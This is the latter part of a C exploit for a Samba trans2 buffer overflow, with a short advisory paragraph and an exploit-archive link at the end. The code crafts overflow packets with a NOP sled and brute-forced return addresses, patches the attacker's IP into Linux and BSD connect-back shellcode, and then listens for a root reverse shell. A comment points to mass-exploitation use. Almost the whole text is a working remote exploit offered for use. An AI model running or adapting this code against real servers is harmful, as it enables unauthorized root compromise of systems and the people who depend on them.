0x00, sizeof(buffer)); netbiosheader = (NETBIOS_HEADER *)buffer; smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); netbiosheader->type = 0x00; /* session message */ netbiosheader->flags = 0x04; netbiosheader->length = htons(2096); smbheader->protocol[0] = 0xFF; smbheader->protocol[1] = 'S'; smbheader->protocol[2] = 'M'; smbheader->protocol[3] = 'B'; smbheader->command = 0x32; /* SMBtrans2 */ smbheader->tid = 0x01; smbheader->uid = 100; memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000); for (i = 0; i < 4 * 24; i += 4) memcpy(buffer + 1131 + i, &dummy, 4); memcpy(buffer + 1127, &ret, 4); memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), exploit_data, sizeof(exploit_data) - 1); memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode)); if(write_timer(sock, 3) == 1) { if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1; return 0; } return -1; } void shell(int sock) { fd_set fd_read; char buff[1024], *cmd="uname -a;id;\n"; int n; send(sock, cmd, strlen(cmd), 0); while(1) { FD_SET(sock,&fd_read); FD_SET(0,&fd_read); if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break; if( FD_ISSET(sock, &fd_read) ) { n=read(sock,buff,sizeof(buff)); if (n == 0) { printf ("Connection closed.\n"); exit(EXIT_FAILURE); } else if (n < 0) { perror("read remote"); exit(EXIT_FAILURE); } write(1,buff,n); } if ( FD_ISSET(0, &fd_read) ) { if((n=read(0,buff,sizeof(buff)))<=0){ perror ("read user"); exit(EXIT_FAILURE); } write(sock,buff,n); } } close(sock); } void GoAway() { exit(0); } void start_listen() { FILE *fstat; int cpid; LISTENER: bzero(&serv_addr, sizeof(serv_addr)); serv_addr.sin_family=2; serv_addr.sin_addr.s_addr=0; serv_addr.sin_port=htons(port_listen); sock_listen=socket(2,1,6); if(bind(sock_listen,(struct sockaddr *)&serv_addr,16)) { port_listen++; goto LISTENER; } if(listen(sock_listen,1)) { perror("listen"); exit(1); } fprintf(stdout, "[+] Listen on port: %d\n",port_listen); cpid = fork(); if (cpid) { client=accept(sock_listen,0,0); LOOP = 0; kill(SIGUSR2, exploit_pid); if (client > 0) { fprintf(stdout, "[+] Yeah, I have a root ....!\n" "------------------------------\n"); fstat=fopen(".ROOT", "a"); //needed by mass.c fclose(fstat); shell(client); } exit(0); } } int main (int argc,char *argv[]) { char *shellcode = NULL; int typeos = -1; int port = 139; int sock = 0; int i = 0; int status = 0; int m = 0; int ip1 = 0; int ip2 = 0; int ip3 = 0; int ip4 = 0; int sta = 0; int STEPS = 512; int ENDLOOP = 64; char *desc; unsigned long MAX_CHILDS = 40; unsigned long ret = 0x0; unsigned short int a_port; struct sockaddr_in addr1; struct hostent *he; struct stat st; if (argc != 4) usage(argv[0]); typeos = atoi(argv[1]); if (typeos > 3) { fprintf(stdout, "Os type out of list!\n"); exit(1); } he = gethostbyname(argv[2]); if (he == NULL) { fprintf(stderr, "Unable to resolve\n"); return -1; } listen_pid = getpid(); start_listen(); exploit_pid = listen_pid + 1; //fprintf(stdout, "[+] Listen pid: %d, exploit pid: %d\n", listen_pid,exploit_pid); sscanf(argv[3], "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4); linux_connect_back[171] = ip1; bsd_connect_back[162] = ip1; linux_connect_back[172] = ip2; bsd_connect_back[163] = ip2; linux_connect_back[173] = ip3; bsd_connect_back[164] = ip3; linux_connect_back[174] = ip4; bsd_connect_back[165] = ip4; fprintf(stdout, "[+] Connecting back to: [%d.%d.%d.%d:%d]\n", ip1, ip2, ip3, ip4, port_listen); a_port = htons(port_listen); linux_connect_back[177]= (a_port) & 0xff; linux_connect_back[178]= (a_port >> 8) & 0xff; bsd_connect_back[168]= (a_port) & 0xff; bsd_connect_back[169]= (a_port >> 8) & 0xff; switch(typeos) { case 0: desc = "Linux"; ret = 0xc0000000; shellcode = linux_connect_back; break; case 1: desc = "FreeBSD/NetBSD"; ret = 0xbfc00000; shellcode = bsd_connect_back; break; case 2: desc = "OpenBSD 3.1 and prior"; ret = 0xdfc00000; shellcode = bsd_connect_back; break; case 3: desc = "OpenBSD 3.2 non-exec stack"; ret = 0x00170000; shellcode = bsd_connect_back; break; } fprintf(stdout, "[+] Target: %s\n", desc); memcpy(&addr1.sin_addr, he->h_addr, he->h_length); addr1.sin_family = AF_INET; addr1.sin_port = htons(port); fprintf(stdout, "[+] Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr), port); fprintf(stdout, "[+] Please wait in seconds...!\n"); signal(SIGUSR2, GoAway); for (i = 0; i < 50; i++) childs[i] = -1; i = 0; m = 0; while (LOOP) { if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) { fprintf(stderr, "[+] socket() error.\n"); exit(-1); } ret -= STEPS; i++; if ((ret & 0xff) == 0x00 && typeos != 3) ret++; m++; //fflush(0); //fprintf(stdout, "[+] Return Address: 0x%08x [%02d]\n", (unsigned int)ret, m); usleep(150000); switch (childs[i] = fork()) { case 0: if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) { //fprintf(stderr, "[+] connect() error.\n"); close(sock); exit(-1); } start_session(sock); sleep(3); if (typeos != 3) { if (exploit_normal(sock, ret, shellcode) < 0) { //fprintf(stderr, " -> Failed.\n"); close(sock); exit(-1); } } else { if (exploit_openbsd32(sock, ret, shellcode) < 0) { //fprintf(stderr, " -> Failed.\n"); close(sock); exit(-1); } } sleep(5); close(sock); exit(0); break; case -1: exit(-1); break; default: if (i > MAX_CHILDS - 2) { wait(&status); i--; } break; } if (m == ENDLOOP) LOOP = 0; } if (stat(".ROOT", &st) != -1) kill(SIGUSR2, listen_pid); else { fprintf(stdout, "[+] Dohh, exploit failed.\n"); close(client); close(sock_listen); kill(listen_pid, SIGUSR2); sleep(2); exit(0); } }

source: https://www.securityfocus.com/bid/7294/info A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory. Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process. It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22471.tar.gz